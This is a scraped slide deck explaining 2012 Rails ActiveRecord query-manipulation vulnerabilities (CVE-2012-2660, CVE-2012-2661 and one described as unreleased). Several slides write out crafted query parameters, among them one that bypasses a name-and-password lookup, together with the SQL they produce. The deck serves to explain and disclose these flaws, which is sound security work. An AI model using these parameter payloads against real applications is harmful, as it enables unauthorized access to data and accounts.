×
Copy
Open
Link
Embed
Share
Beginning
This slide
Copy link URL
Copy link URL
Copy iframe embed code
Copy iframe embed code
Copy javascript embed code
Copy javascript embed code
Share
Tweet
Share
Tweet
Slide 1
Slide 1 text
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
Slide 2
Slide 2 text
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x and 3.x
Slide 3
Slide 3 text
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Slide 4
Slide 4 text
Query Parameters ?name[] {"name"=>[nil]}
Slide 5
Slide 5 text
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Slide 6
Slide 6 text
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
Slide 7
Slide 7 text
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query keys Affects Rails 3.x
Slide 8
Slide 8 text
ActiveRecord Query User.where(:name => params[:name])
Slide 9
Slide 9 text
ActiveRecord Query User.where("users.name" => params[:name])
Slide 10
Slide 10 text
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
Slide 11
Slide 11 text
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Slide 12
Slide 12 text
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" = 1
Slide 13
Slide 13 text
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested hashes in query values Affects 2.3.x and 3.x
Slide 14
Slide 14 text
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Slide 15
Slide 15 text
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
Slide 16
Slide 16 text
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Slide 17
Slide 17 text
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" = 1 AND "users"."id" = 1